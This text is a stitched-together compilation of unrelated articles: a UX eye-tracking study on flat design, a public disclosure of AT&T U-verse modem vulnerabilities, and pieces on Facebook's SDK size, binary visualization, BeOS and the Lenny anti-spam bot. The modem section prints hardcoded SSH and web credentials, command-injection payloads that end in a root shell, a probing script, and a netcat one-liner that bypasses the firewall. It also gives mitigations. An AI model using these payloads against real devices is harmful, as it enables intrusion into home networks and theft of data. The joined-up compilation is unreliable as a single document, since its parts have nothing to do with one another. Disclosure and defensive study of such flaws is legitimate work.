Participants were asked to find the pearl jewelry on the site. The intended target was a Shop Pearl link at the bottom of the page.

The weak-signifier version showed red areas on the primary navigation, as well as on the 3 Year: Pearl heading. In contrast, the target link received most fixations in the strong-signifier variant. When we inspected the individual-participant data, we discovered that many users (9 of the 24 participants) who saw the weak signifier version stopped at the subheading, and never looked at the text link. They believed they could click on that subheading to reach the pearl jewelry and didn’t continue down to see the link.

In the strong signifier version, 86% (25 out of 29) participants first fixated on the heading, and then moved to the Shop Pearl target link. In the weak version, only 50% (12 out of 24) followed this pattern. (This difference is statistically significant; p < 0.005.) The links styled like static text didn’t draw users’ eyes down from the subheading, while the strong, traditionally styled links did.

Page Pairs with Nearly Identical User Gaze Patterns

3 of the 9 sites resulted in no differences in the gaze patterns between strong and weak signifiers. Why are these three page pairs nearly identical, while the other six pairs showed substantial differences?

The answers give us some interesting information about when flat UIs can work without damaging interaction.

One of the stimulus pairs had in-line text links as the target element: light purple, nonunderlined links vs. traditional blue, underlined links. In this pair, the weak-stimulus heatmap only showed a very slightly wider distribution of fixations on the paragraph containing the target link.

This suggests that the low-contrast presentation of in-line links, compared with regular text, may be a slightly weaker signifier, but not perceptibly so. In the case of Brilliant Earth, however, the lack of a contrasting color for links had a big impact, as shown above. We can speculate that there is a contrast continuum: the stronger the color contrast between links and surrounding text, the higher the chance that users will recognize them. If we had used a light grey highlight color in the weak version of Ally Bank, we might expect to see a more dramatic difference in the gaze patterns. As long as in-line text links are presented in a contrasting color, users will recognize their purpose, even without an underline.

The other two stimulus pairs with no discernible heatmap differences between the weak and strong versions had some traits in common, when compared to the rest of the stimuli:

  • Low information density. The pages contained relatively little content and ample white space, meaning that even things that didn’t stand out much still did stand out, because they weren’t competing with many other page elements.
  • Traditional layout. Elements (buttons, links, navigation) were located in standard positions, where users typically expect them to be.
  • Salient, high-contrast targets. The target elements were high-contrast compared to the items around them, and had plenty of space to separate them from those elements, making them more noticeable.

Weak Signifiers Increase Interaction Cost

We want our users to have experiences that are easy, seamless, and enjoyable. Users need to be able to look at a page, and understand their options immediately. They need to be able to glance at what they’re looking for and know instantly, “Yep, that’s it.”

The problem is not that users never see a weakly signified UI element. It’s that even when they do see the weak element, they don’t feel confident that it is what they want, so they keep looking around the page.

Designs with weak clickability signifiers waste users’ time: people need to look at more UI elements and spend more time on the page, as captured by heatmaps, average counts of fixations, and average task time. These findings all suggest that with weak signifiers, users are getting less of that feeling of empowerment and decisiveness. They’re experiencing click uncertainty.

When Flat Designs Can Work

These findings also confirm that flat or flat-ish designs can work better in certain conditions than others. As we saw in this experiment, the potential negative consequences of weak signifiers are diminished when the site has a low information density, traditional or consistent layout, and places important interactive elements where they stand out from surrounding elements.

Ideally, to avoid click uncertainty, all three of those criteria should be met, not just one or two. A site with a substantial amount of potentially overwhelming content, or radically new page layouts or patterns, should proceed with caution when adopting an ultraflat design. These characteristics echo our recommendations for adopting a flat UI without damaging the interaction on your site.

Notice that those characteristics are also just good, basic UX design best practice: visual simplicity, external consistency, clear visual hierarchy, and contrast. In general, if you have an experienced UX team that cares about user research, you’ll do better with a flat design than other product teams that don’t. If your designs are already strong, any potential weakness introduced by flat design will be mitigated. If you’re conducting regular user research, any mistakes you make in implementing a flat UI will be identified and corrected.

Limitations of the Study

To get comparable, interpretable results from this experiment, we had to ask users to do very focused, short tasks on a single page. In real life, users don’t do tasks that way. They arrive at your site and don’t know who you are or what you do. They navigate to pages, and don’t know for sure that they’ll find what they’re looking for there. They explore offerings and options.

Remember that there’s a difference between findability and discoverability. Strong signifiers are helpful in situations where users care about finding something specific. They’re absolutely crucial in situations where you care that users discover a feature that they didn’t know existed.

SharknAT&To: Vulnerabilities in AT&T U-verse modems

Note: All ports referenced in the following post are TCP.

 Introduction

When evidence of the problems described in this report was first noticed, it almost seemed hard to believe. However, for those familiar with the technical history of Arris and the hardcoded accounts that have carelessly lingered on their products, this report will sadly come as no surprise. For everyone else, prepare to be horrified.

In all fairness, it is uncertain whether these gaping security holes were introduced by Arris (the OEM) or if these problems were added after delivery to the ISP (AT&T U-verse). From examining the firmware, it seems apparent that AT&T engineers have the authority and ability to add and customize code running on these devices, which they then provide to the consumer (as they should).

Some of the problems discussed here affect most AT&T U-verse modems regardless of the OEM, while others seem to be OEM specific. So it is not easy to tell who is responsible for this situation. It could be either, or more likely, it could be both. The hope behind writing this is that the problems will be swiftly patched and that going forward, peer reviews and/or vulnerability testing on new releases of production firmware will be implemented prior to pushing it to the gateways. Security through obscurity is not acceptable in today’s high threat landscape and this is especially true regarding devices which a) route traffic, sensitive communications and trade secrets for millions of customers in the US, b) are directly reachable from the Internet at large, and c) have wireless capability and therefore have an additional method of spreading infection and releasing data.

Regardless of why, when, or even who introduced these vulnerabilities, it is the responsibility of the ISP to ensure that their network and equipment provide a safe environment for their end users. This, sadly, is not currently the case. The first vulnerability found was caused by pure carelessness, if not intentional altogether. Furthermore, it is hard to believe that no one is already exploiting this vulnerability to the detriment of innocents, which is why this report is not passing Go, not collecting $200, and is going straight to the public domain. The vulnerabilities found here are ordered roughly from least to most prevalent.

1. SSH exposed to The Internet; superuser account with hardcoded username/password.

It was found that the latest firmware update (9.2.2h0d83) for the NVG589 and NVG599 modems enabled SSH and contained hardcoded credentials which can be used to gain access to the modem’s “cshell” client over SSH. The cshell is a limited menu driven shell which is capable of viewing/changing the WiFi SSID/password, modifying the network setup, re-flashing the firmware from a file served by any tftp server on the Internet, and even controlling what appears to be a kernel module whose sole purpose seems to be to inject advertisements into the user’s unencrypted web traffic. Although no clear evidence was found suggesting that this module is actually being used currently, it is present, and vulnerable. Aside from the most dangerous items listed above, the cshell application is also capable of many other privileged actions. The username for this access is remotessh and the password is 5SaP9I26.

Figure 1: Attacker view of cshell after login to an affected U-verse modem.

To reiterate the carelessness of this firmware release: the cshell binary is running as root, so any exploitable command injection vulnerability or buffer overflow will result in a root shell. Yes, it is running as root, and it is trivially susceptible to command injection. Through the menu's ping functionality, and because parameters are not sanitized, one can execute arbitrary commands through the menu, or escape the menu altogether. An example payload is shown below.

>> ping -c 1 192.168.1.254;echo /bin/nsh >>/etc/shells

>> ping -c 1 192.168.1.254;echo /bin/sh >>/etc/shells

>> ping -c 1 192.168.1.254;sed -i 's/remotessh:\/:\/bin\/cshell/remotessh:\/:\/bin\/nsh/g' /etc/passwd

Now type exit and then reconnect via SSH. The prompt will change from NOS/xxxxxxxxxxxxx to Axis/xxxxxxxxxxxxxxx. At this point the attacker can type “!” and will be given a BusyBox root shell.

Please note that the cshell binary was only examined briefly and only until the easiest exploit was found. Judging by the binary’s repetitive use of unsafe C functions, one can guess that hundreds of additional vulnerabilities exist. However, we find it highly amusing that the first vulnerability found was so trivial that it looks like it came out of one of those “hacking tutorials” that were popular in the 90’s (Google “how to hack filetype:txt”).

This is the first and least common vulnerability that was discovered. The number of exposed devices is not as large as for the rest, but it is still quite unacceptable when you realize that each of these devices corresponds to people being put at unnecessary risk of theft and fraud.

Censys reports 14,894 hosts which are likely vulnerable. There is no guarantee, expressed or implied, that this number is all-inclusive, however.

2. Default credentials “caserver” https server NVG599

An HTTPS server of unknown purpose was found running on port 49955 with default credentials. The username tech with an empty password field conveys access to this highly vulnerable web server, which uses only a Basic Authorization scheme. The server seems slightly unstable in its authorization handling, denying access on the first attempt even with valid credentials and eventually completely locking up with an “unauthorized” message. It remains unclear whether this is just poor coding or more security through obscurity, but either is unacceptable.
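As a hedged illustration only, a basic probe for this behaviour might look like the sketch below; the host address is a placeholder, the web-root path is an assumption, and the retry loop simply reflects the flaky authorization described above.

import requests
import urllib3

urllib3.disable_warnings()  # the modem presents a self-signed certificate

HOST = "198.51.100.1"  # placeholder address of a device under test

# Default credentials described above: username "tech" with an empty password.
for attempt in range(3):
    response = requests.get(
        f"https://{HOST}:49955/",
        auth=("tech", ""),
        verify=False,
        timeout=10,
    )
    print(attempt, response.status_code)
    if response.status_code == 200:
        break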

3. Command Injection “caserver” https server NVG599

How many vulnerabilities did you find in the screenshot above?

The next vulnerability is the caserver command injection vulnerability. The exact intended purpose of caserver is unclear, but its implications are not. Caserver is an HTTPS server that runs on port 49955 of affected devices (which seem to be limited to the NVG599 modem). The caserver script takes several commands, including:

  • Upload of a firmware image
  • Requests to a get_data handler which enumerates any object available in its internal “SDB” databases with a lot of fruitful information
  • Requests to a set_data command which allows changes to the SDB configuration

The screenshot below shows the request which causes command injection, again … as the root user. Note that for the first request the server will probably reply “You are not authorized to access this page”. This can simply be ignored, and resubmitting the request shown will yield command execution. The service can be a little quirky: it locks you out after about 5 requests, and a reboot will fix the issue if you are testing and running into this problem. The User-Agent field seems to be required, but any string will suffice.

There are countless ways to exploit this, but a few quick and dirty stacked commands using wget to download busybox with netcat (mips-BE) from an http server (no SSL support) and then spawn a reverse shell works well.

Estimating the number of hosts affected was trickier due to the service being on an uncommon port. Host search engines such as Censys and Shodan don’t commonly scan for these services or ports. Based on self-collected data, our ballpark figure is around 220,000 devices.

4. Information disclosure/hardcoded credentials

The next vulnerability involves a service on port 61001 which will give an attacker a plethora of useful data about the device. The attacker however, will need to know the serial number of the device ahead of time. Once this information is acquired, the request can be made.

Figure 3: Request to BDC server.

Just before the serial number, notice the characters “001E46”. This number correlates with the model number and is a valid Arris Organizationally Unique Identifier (OUI). This particular OUI was brute-forced from a list of Arris OUIs obtained at https://www.wireshark.org/tools/oui-lookup.html.

When the correct serial number, OUI, and username/password are submitted as above the server will hang for several seconds before returning a response. Afterwards, several pieces of invaluable information are returned about the modem’s configuration, as well as its logs. The most sensitive pieces of information are probably the WiFi credentials and the MAC addresses of the internal hosts, as they can be used for the next vulnerability.

The hardcoded username/password credentials are bdctest/bdctest. This is the second most prevalent vulnerability, but at the moment it is not the biggest threat since the modem’s serial number is needed to exploit it. This may change if an attacker were to find a reliable way of obtaining the serial number. If present, an attacker could use the aforementioned “caserver” to retrieve the serial number as well by requesting a valid file present in the webroot other than “/caserver”. One such example would be “/functions.lua”. Sending a GET request to this file will return the serial number amongst the headers.

This normally would not be advantageous for an attacker since the presence of the caserver service equates to root shell access. However, if the caserver is locked, then this is a method to overcome the lockout since only the path ”/caserver” is locked-out.

5. Firewall bypass no authentication

The most prevalent vulnerability, based solely on the high number of affected devices, is the firewall bypass that is made possible by the service listening on port 49152. This program takes a three byte magic value “\x2a\xce\x01” followed by the six byte MAC address and two byte port of whichever internal host one would like to connect to, from anywhere on The Internet! What this basically means is that the only thing protecting an AT&T U-verse internal network device from The Internet is whether or not an attacker knows or is able to brute-force the MAC address of any of its devices! Note, however, that the first three bytes (six characters) of a MAC address are very predictable since they correspond to the manufacturer. Given this, an attacker could very well start out with this scheme, with the unknowns marked as:

“\x2a\xce\x01\xab\x23\xed\x??\x??\x??\x??\x??”

To make matters worse, this TCP proxy service will alert the attacker when they have found a correct MAC address by returning a different error code to signify that either the host didn’t respond on the specified port or that an RST was returned. Therefore, the attacker is able to attack the MAC address brute-force and the port brute-force problems separately, greatly decreasing the amount of keyspace which must be covered: instead of searching the combined space of 2^24 MAC suffixes times 2^16 ports (roughly 1.1 trillion combinations), only about 2^24 + 2^16, or roughly 16.8 million, probes are needed. The scheme now looks something like this (guessing the last three bytes of the MAC):

“\x2a\xce\x01\xab\x23\xed\x??\x??\x??\xaa\xaa”

Followed by (Guessing port, same as a TCP port scan):

“\x2a\xce\x01\xab\x23\xed\x38\x41\xa0\x??\x??”

At this point it becomes feasible for a determined attacker to use a brute force attack. Aside from the brute force approach, there are other methods of obtaining the MAC addresses, such as the previously mentioned vulnerability, or using a wireless device in monitor mode to sniff the wireless clients’ MAC addresses. Basically, if your neighbor knows your public IP address, you are in immediate danger of intrusion.

Going off of the example above, suppose the device with MAC address ab:23:ed:38:41:a0 has an http server running on port 80 (with the firewall configured to not allow incoming traffic) and an attacker wants to connect and issue a GET request for the webroot. The command would be:

python -c 'print "\x2a\xce\x01\xab\x23\xed\x38\x41\xa0\x00\x50GET / HTTP/1.0\n\n"' | nc publicip 49152

This will open an unauthorized TCP connection between the attacker and the “protected” web server despite the user never authorizing it.

It is believed that the original purpose of this service was to allow AT&T to connect to the AT&T issued DVR devices which reside on the internal LAN. However, it should be painfully obvious by now that there is something terribly wrong with this implementation. Added to the severity is the fact that every single AT&T device observed has had this port (49152) open and has responded to probes in the same way. It is also important to note that the gateway itself cannot be connected to in this manner. For example, an attacker cannot set the MAC address to that of the modem’s LAN interface and the port to correspond to the web configuration console. This attempt will fail. This TCP proxy service will only connect attackers to client devices.

In Conclusion

In 2017, when artificial intelligence runs the largest advertising firm on the Internet, when only last year the largest leaks in American history occurred, and when vehicles are self-driving, autonomous, Internet-connected, and hacked … why do we still find CGI injections, root-privileged services exposed with blank default passwords, and what most will likely term “backdoored” credentials?

Developing software is no trivial task, and it is part of this company’s core services, but carelessness of this magnitude should come with some accountability. Below are some workarounds for the vulnerabilities described in this write-up; the time of full disclosure is (mostly) gone, but let the time of accountability begin.

Accountability, or is it OK to continuously accept free credit monitoring from vendors, governments, and corporations “accidentally” exposing your privacy, and in this case maybe that of your family too?

Vulnerability 1: SSH exposed to The Internet; superuser account with hardcoded username/password.

To disable the SSH backdoor, perform the following commands. Substitute “ipaddress” with your gateway’s IP address (internal or external).

ssh remotessh@ipaddress

(Enter password 5SaP9I26)

NOS/255291283229493> configure

Config Mode v1.3

NOS/255291283229493 (top)>> set management remote-access ssh-permanent-enable off

NOS/255291283229493 (top)>> save

NOS/255291283229493 (top)>> exit

NOS/255291283229493> restart

Vulnerabilities 2 & 3: Disable CASERVER for the NVG599.

If suffering also from vulnerability 4, please refer to vulnerability 4’s mitigation steps before proceeding with these steps. Using Burp Suite or some other application which lets you customize web requests, submit the following request to the gateway’s external IP address from outside of the LAN.

POST /caserver HTTP/1.1
Host: FIXMYMODEM
Authorization: Basic dGVjaDo=
User-Agent: Fixmymodem
Connection: Keep-Alive
Content-Length: 77

appid=001&set_data=fixit;chmod 000 /var/caserver/caserver;fixit

Vulnerability 4: Information disclosure/hardcoded credentials

At the present time we only have a fix for vulnerability 4 for those who have root access on their gateway. Root access may be obtained via vulnerabilities 1, 2, or 3, via a serial TTY line, or by some other method unknown to us. We will, however, continue searching for a workaround to help those without root access.

For those suffering from the CASERVER vulnerability (port 49955) but not the SSH backdoor, submit the following command before disabling caserver.

POST /caserver HTTP/1.1
Host: FIXMYMODEM
Authorization: Basic dGVjaDo=
User-Agent: Fixmymodem
Connection: Keep-Alive
Content-Length: 77

appid=001&set_data=fixit;chmod 000 /www/sbdc/cgi-bin/sbdc.ha;fixit

Those with access to the SSH backdoor may submit the following command from cshell.

NOS/123456789>> ping -c 1 192.168.1.254;chmod 000 /www/sbdc/cgi-bin/sbdc.ha

Vulnerability 5: Firewall bypass no authentication

The most widespread vulnerability found is luckily the easiest to fix. This mitigation technique only requires access to the modem’s configuration portal and admin password (printed on label). While connected to the LAN, go to 192.168.1.254 in a web browser. Click on Firewall->NAT/Gaming.

Click on Custom Services. Fill in the fields as shown below. In the “Base Host Port” field, type a port number that is not in use by an internal host (this traffic will be directed to an actual internal host). Port 1 is usually a good choice.

Click Add.

Select a device in “Needed by Device” to redirect traffic to. Make sure the Service that was created in the previous step is selected. Click Add.

Port 49152 should now either not respond or send an RST. Otherwise, check and make sure a service is not running on the chosen internal port (port 1).
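
To double-check that the proxy really is closed off, the port can be probed from outside the LAN. The following is a minimal sketch, assuming Python 3; the public IP, MAC address, and port below are placeholder values you would substitute with your own, and the helper simply rebuilds the 11-byte request described above.

import socket
import struct

# Placeholder values: substitute your gateway's public IP and the MAC address/port
# of an internal device that is known to be listening (e.g. a web server).
PUBLIC_IP = "203.0.113.10"
TARGET_MAC = "ab:23:ed:38:41:a0"
TARGET_PORT = 80

def probe(public_ip, mac, port, timeout=5):
    """Send the 11-byte proxy request (magic + MAC + port) and return any reply."""
    mac_bytes = bytes(int(octet, 16) for octet in mac.split(":"))
    payload = b"\x2a\xce\x01" + mac_bytes + struct.pack(">H", port)
    with socket.create_connection((public_ip, 49152), timeout=timeout) as sock:
        sock.sendall(payload + b"GET / HTTP/1.0\r\n\r\n")
        try:
            return sock.recv(4096)
        except socket.timeout:
            return b""

if __name__ == "__main__":
    try:
        reply = probe(PUBLIC_IP, TARGET_MAC, TARGET_PORT)
    except OSError as exc:
        print("Port 49152 refused, reset, or timed out (%r); the mitigation appears effective." % exc)
    else:
        if reply:
            print("Received data back; the proxy may still be forwarding traffic:")
            print(reply[:200])
        else:
            print("Connected, but nothing came back within the timeout.")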

Disclaimer: No guarantee is expressed or implied that performing the actions described above will not cause damage to and/or render inoperable any or all electronic devices on and orbiting Earth, including your modem!  If you choose to proceed, you are doing so at your own risk and liability. 

Why 16% of the code on the average site belongs to Facebook, and what that means


According to data collected by BuiltWith.com, 6% of the top 10,000 most high-traffic sites load content from Facebook’s servers. For the vast majority of them, that content is likely Facebook’s Javascript SDK, a huge block of code that is needed to display such features as the Like button (as seen on many media sites) and Facebook comments widgets (also used on many big media sites, Buzzfeed among them). The SDK code is so big that it represents about 16% of the total size of all Javascript on the average web page.

One of the culprits behind modern websites taking so long to download

As a sizable and widely-used software library, the Facebook SDK is a nice way of illustrating some of the answers to the questions: just why is the average site today so big? And how much does size actually matter?

Why so big?

The Facebook SDK is very full-featured, duplicating many of the tools the average site is likely to already include for its own developers’ use: methods for retrieving data from other sites, for determining which browser and device the user is using so as to target specific features to them, and for displaying UI elements (like confirmation dialogs and buttons). If we categorize all of the pieces of the SDK, the breakdown looks like this:

The amount that each set of features in the SDK contributes to total filesize. (Note that this is the size of the file before it has been compressed; the final package will be smaller.) [Source data, methodology, and more screen-reader-compatible data table]

Of the sets of features, three stand out the most:

The three sets of features in the SDK that are completely irrelevant to the vast majority of users on most sites. Eliminating them — if it were possible to do so — would shave off roughly 20% of the SDK filesize. [Source data, methodology, and more screen-reader-compatible data table]

“Canvas” is Facebook’s system for apps that are intended to be loaded within Facebook (Facebook made a major push in the past to encourage developers to build apps that lived within Facebook; I’m not entirely sure how widely such apps are used today, but either way, a regular website does not use any of the Canvas-related features.) The cost of including them in the SDK is pretty marginal: only 1.5% of total size.

After that, we have legacy feature support. This reflects the fact that an API will accumulate multiple interfaces for handling the same features over time. For example, developers can write code that calls either FB.getLoginStatus() (the legacy approach to requesting the user’s current Facebook login status) or Auth.getLoginStatus() (the new, encouraged approach). The way to get around needing to include both sets of methods is releasing them in separate versions of the SDK, but Facebook opted not to do this, likely to simplify the experience for developers and to maximize the number of sites using the exact same file (to increase the likelihood that the average user already has it downloaded). This decision comes at a small cost: roughly 3.5% of the SDK code is for handling features that are explicitly marked as “legacy” (and it’s quite possible that there are many more “legacy” features that just aren’t explicitly marked as such).

Most significantly, the SDK includes a number of polyfills and polyfill-like utilities, which make up over 15% of its code. Polyfills are used to supply features that are found in newer browsers to older browsers, and sometimes also to supply newer features that are upcoming but haven’t been added to any browsers yet. Most of the polyfills included by the Facebook SDK are for features that are already included in browsers used by the vast majority of internet users. They serve only to make the SDK work for the < 1% of global internet users who are using old browsers like Internet Explorer 8, which many (if not the vast majority of) major sites have given up on supporting.

Of the remaining ~80% of the SDK, it’s a bit more difficult to untangle which features are needed for which purpose. This is because it is written such that, to use a simple feature like the Like button, one must also include code that is used only for comments, video embeds, login buttons, and other unrelated features. Facebook could have opted to distribute much smaller files for including only single features such as Like buttons, but has a business goal of encouraging sites to use as many FB-provided features as possible.

Does size matter?

Due to the widespread use of Facebook’s SDK, and the fact that it changes relatively infrequently, many users are likely to have already downloaded it before they load a site. In fact, this is a big part of the rationale for why Facebook would distribute such a huge file, rather than smaller ones for specific features such as Like buttons. And on most users’ network connections — at least those in developed countries — the time it takes to download the file is marginal.

But regardless of whether the user’s browser already has the SDK downloaded, there is still overhead involved in running a large block of Javascript, especially on mobile devices. On the relatively new MacBook Pro I’m writing this on, Facebook’s SDK takes around 50ms (1/20th of a second), to run on a site like Buzzfeed. Not bad — especially when taken in context with the rest of the JS code, including ad-related code that takes far longer to execute — but still a non-trivial cost for something that is only used to display comments on the very bottom of the page.

Script evaluation in Chrome on a recent MacBook Pro

On a very new smartphone (Google Pixel), the JS execution time is doubled, now taking over 1/10th of a second:

Script evaluation on a Google Pixel smartphone

When looked at in context, this is a tiny fraction of the total code execution time on the page. But it adds to the amount of time during which scrolling or otherwise interacting with the page can be a choppy and unpleasant experience. And this gets at an important point: this particular SDK has a marginal cost, but modern websites — especially media sites — often include similar code from a large number of third parties (this example I captured from Gawker before it was killed by a billionaire vampire shows just how many such requests there can be).

Even setting aside the privacy impact of sending some user information to each of these third parties, the cost of all these features adds up quickly. Each third-party script that a site adds comes at a cost, both in terms of performance and in helping to rationalize the addition of the next “relatively harmless” chunk of third-party code later on. Besides the immediate performance impact of the additive cost of all of this code, this impacts developer morale: imagine working for days to shave off 10% of your own code’s load time, only to see a giant block of third-party code added that dwarfs the impact of that painstaking effort. And then (if you work for a media site), seeing this same pattern repeat itself over and over again every few months.

Should you include it?

If you need to use a feature like Facebook Comments, there’s no getting around the need to load the Facebook SDK. But depending on how your site is structured, you may be able to limit the SDK’s performance impact by only loading it when needed (e.g. once the user has scrolled down to the point where comments should become visible).

If you want to use the Like button, stop and reconsider. Facebook no longer displays Likes of a page prominently (or, in most cases, at all) on user timelines. It’s better to use a simple custom Share button or link, and as a side benefit, doing so will prevent Facebook from tracking all visits to your page and interfering with the privacy of your users. Sites that have eliminated the Like button have failed to identify any negative impact of doing so when it comes to Facebook traffic referrals.

Binary data visualization


This page contains examples of Veles visualization. For explanation on how they actually work check out Binary visualization explained.

By testing Veles visualizations on numerous files we found that different types of data look very different.
We can easily notice the differences between a bitmap, a mobi file, a java .class file and an x86 compiled binary.


On a side note – visualizations of compressed or encrypted data look like a bunch of noise, so any trace of a pattern in the visualized data immediately stands out. For example, compare the gpg encrypted data and a .zip archive below. The visualization makes it easy to spot headers in a zip archive. By switching to a “layered digram” mode of visualization we can immediately locate the headers at the end of the file. And not only that – we can also recognize certain patterns in the compressed stream (like the line on the right side of the image).


Back to compiled binaries. We found out that any machine code looks roughly similar, but different architectures have characteristic traits that can be used to recognize them. Below is the same binary compiled for three different architectures:


Ok, now let’s take a look at a specific file. For this demo, we’ll use libc.so from Ubuntu 14.04.

Recognising x86-64 architecture

As mentioned in the video, we can recognise x86-64 code by finding 2 characteristic bars in the trigram view. Such a pair of bars means that there is a common sequence of 2 specific bytes (let’s call them x and y). One of the bars will correspond to trigrams <something, x, y>, while the second bar will be made of trigrams <x, y, something>.

So why do we see these bars in x86-64 machine code? It turns out that the default operand size for many instructions in 64-bit mode is 32 bits. If we want to use a 64-bit register we need to add a REX prefix. That means we prefix the instruction opcode with an additional byte with a value 0x40 + flags on lower 4 bits. In particular, many variants of MOV instruction will have a 2 byte opcode 0x4X 0x8Y (where X and Y depend on exactly which version of the instruction we used). Since MOV is an extremely common instruction, there will be a lot of those digrams in any x86 64-bit binary and we will clearly see the bars in trigram view. It’s also worth mentioning that another common instruction – LEA – happens to have 0x4X 0x8D opcode, which makes the bars even more visible.
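
As a rough illustration of why those bars appear (this is not part of Veles, just a back-of-the-envelope check), counting adjacent byte pairs in a binary will typically show REX.W-prefixed MOV and LEA pairs such as 0x48 0x8b and 0x48 0x8d near the top of the list for x86-64 code:

from collections import Counter
import sys

def top_digrams(path, n=10):
    """Count adjacent byte pairs (digrams) in a file and return the most common ones."""
    with open(path, "rb") as f:
        data = f.read()
    return Counter(zip(data, data[1:])).most_common(n)

if __name__ == "__main__":
    for (a, b), count in top_digrams(sys.argv[1]):
        # On 64-bit x86 code, pairs like (0x48, 0x8b) and (0x48, 0x8d),
        # i.e. REX.W-prefixed MOV and LEA, tend to rank very high.
        print("%02x %02x: %d" % (a, b, count))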

.gnu.hash

As mentioned in the video the .gnu.hash section of ELF is made of 3 distinct parts:

  • Bloom filter

    This is a probabilistic set with a possibility of false positives. Basically, when inserting an object it’s hashed into a few bit locations and all of those bits are set to 1. To check if the object is already in the set we can just check all of those bits – if at least one of them has a value of 0 then we know the object is not in the set. The idea behind including this in the ELF is to avoid (if possible) the more expensive hashmap lookups. A toy sketch of the idea appears after this list.

    In the visualization we can see that the Bloom filter is mostly random, but there are significantly more 0 bits than 1 bits in it. There are more numbers near the (0, 0, 0) corner of the cube. Additionally, we can see clusters of points near positions corresponding to values with just one or two 1s in binary representation.

  • Hash buckets

    Each value is the lowest index in the dynamic symbol table corresponding to a given hash. What we see in the visualization is relatively small values represented as 32-bit integers.

  • Hash values

    These are computed hash values. As expected, they look like a bunch of white noise in a visualization.

    For a more detailed description of how this section works, check out this link
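
The Bloom filter idea mentioned above is easy to sketch. The snippet below is a generic toy implementation, not the exact .gnu.hash layout, hash function, or sizes (those are fixed by the ELF format); it just shows why a query that hits any zero bit can safely skip the more expensive lookup.

import hashlib

class BloomFilter:
    """Toy Bloom filter: k hashes set k bits; any zero bit on lookup means 'definitely absent'."""

    def __init__(self, size_bits=1024, num_hashes=3):
        self.size = size_bits
        self.num_hashes = num_hashes
        self.bits = bytearray(size_bits // 8)

    def _positions(self, item):
        for i in range(self.num_hashes):
            digest = hashlib.sha256(("%d:%s" % (i, item)).encode()).digest()
            yield int.from_bytes(digest[:4], "little") % self.size

    def add(self, item):
        for pos in self._positions(item):
            self.bits[pos // 8] |= 1 << (pos % 8)

    def might_contain(self, item):
        return all(self.bits[pos // 8] & (1 << (pos % 8)) for pos in self._positions(item))

symbols = BloomFilter()
symbols.add("printf")
print(symbols.might_contain("printf"))          # True
print(symbols.might_contain("no_such_symbol"))  # False, barring a (rare) false positive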


BeOS almost made Apple a different company (2015)


Steve Jobs returned to Apple after a 12-year absence when it acquired his company NeXT in 1997.

Under his leadership, Apple went on to reinvent itself as a leading consumer electronics company and the most valuable publicly traded company in the world.

But it almost didn't happen. Apple came this close to acquiring another company instead, a startup also founded by an Apple alumnus that for a brief moment had what was considered the world's hottest operating system: Be Inc.

Be was founded in 1990 by former Apple COO Jean-Louis Gassée and Apple director of hardware engineering Steve Sakoman, who helped bring Apple's first mobile computer, the Newton, into being. Initially, the company sold its own hardware called the BeBox. But what Apple wanted was the BeOS operating system.


BeOS was an insanely fast and efficient operating system for its time. It could boot in less than 10 seconds, supported dual processors, and, as you can see in the video above, one of the company's favorite stunts was using it to run multiple videos at once. That might not sound like much today, but it was enough to wow '90s computer users who were used to waiting minutes for Windows to boot and were lucky if they could play even a single video at a time.

BeOS attracted a cult following akin to that of the Amiga. Science fiction author Neal Stephenson even called it the Batmobile of operating systems in his book In the Beginning Was the Command Line. But in 1997 BeOS was still rough around the edges, and Gassée and his backers reportedly wanted far more for Be Inc. than Apple thought the company was worth. So Apple acquired NeXT, used its operating system NeXTstep as the basis for OS X, and left Be to fend for itself.

Not Dead Yet

Be never did find a foothold in the market, even after it started selling BeOS as a stand-alone product. The company blamed interference from Microsoft and sued it for antitrust violations in 2002. The case was [settled](http://www.computerweekly.com/news/2240052523/BeOS-will-live-on-as-Microsoft-settles-legal-action) for $23.3 million in 2003, but it was too late for Be, which had already been sold to Palm.

BeOS became the foundation of PalmOS 6, but it was never used on any Palm device. Its intellectual property is now owned by Access, which acquired PalmSource in 2005.

But like most pieces of retro-tech, BeOS still didn't quite die. A German company called yellowTAB continued to sell the operating system for a few years. But more importantly, open source clones sprang up, most significantly Haiku, which aims to be fully compatible with BeOS.

Meanwhile, its engineering team continues to shape the operating system landscape to this day. Many of Be's engineers moved on to Danger, the company behind the Sidekick. When Danger founder Andy Rubin left the company in 2003 to found Android, which was of course later acquired by Google, many of those developers went with him. A few of them still work on Android today. Then there's Dominic Giampaolo, the creator of the Be File System, one of the most critically acclaimed parts of the operating system. In 2002 Giampaolo was hired by Apple, where he has worked on file systems and the Spotlight feature.

These days Gassée says he's glad Apple bought NeXT instead of Be. But it's hard not to wonder what the past couple decades of tech history would have looked like if Apple had gone the other way.

Using chatbots against voicespam: analyzing Lenny’s effectiveness


Using chatbots against voice spam: analyzing Lenny’s effectiveness Sahin et al., SOUPS’17

Act I, Scene I. Lenny is at home in his living room. The phone rings.

Lenny: Hello, thi- this is Lenny!
Telemarketer: Lenny, I’m looking for Mr. NameRedacted
Lenny: Uh– sso- sorry, I’b- I can barely hear you there?
Telemarketer: homeowner
Lenny: ye- yes yes yes
Telemarketer: Mr. NameRedacted, we’re giving free estimates for any work you need on your house. Were you thinking about having any projects? A little craning driveway, roof work, anything you need done. We’ll give you a free estimate.
Lenny: oh good, yes, yes, yes.
Telemarketer: what would you like to have done? What were you thinking about? Anything around the house?
Lenny: uh yes, yes, uh, uh, someone, someone did- did say last week or someone did call last week about the same thing, wa-was that, was that, you?
Telemarketer: No, sir. I’ve might have been in another company. What was it that you were doing?
Lenny: ye-yes. ss- sorry, what- wa- what was your name again?
Telemarketer: yes. What were you thinking about having done?
Lenny: well, it- it it’s funny that you should call, because my third eldest Larissa, uhh, she, she was talking about this. uh, just this last week and you, you know sh- she is- she is very smart I would – I would give her that, because, you know she was the first in the family, to go to the university, and she passed with distinctions, you know we’re- we’re all quit proud of here yes yes, so uhh, yes she was saying that I should , look, you known, get into the, look into this sort of thing. uhh, so, what more can you tell me about it?
Telemarketer: …

(The actual conversation keeps going for over 11 minutes – see Appendix A in the paper for the full transcript.)

Even better, you can listen to a whole playlist’s worth of Lenny’s conversations on YouTube. If you haven’t guessed already, Lenny is a bot which plays a set of pre-recorded voice messages to interact with spammers. You might be surprised just how simple Lenny actually is (though a lot of thought has gone into what he says), yet he’s proven to be very effective at keeping spammers talking for a long time.

The problem of unwanted phone calls.

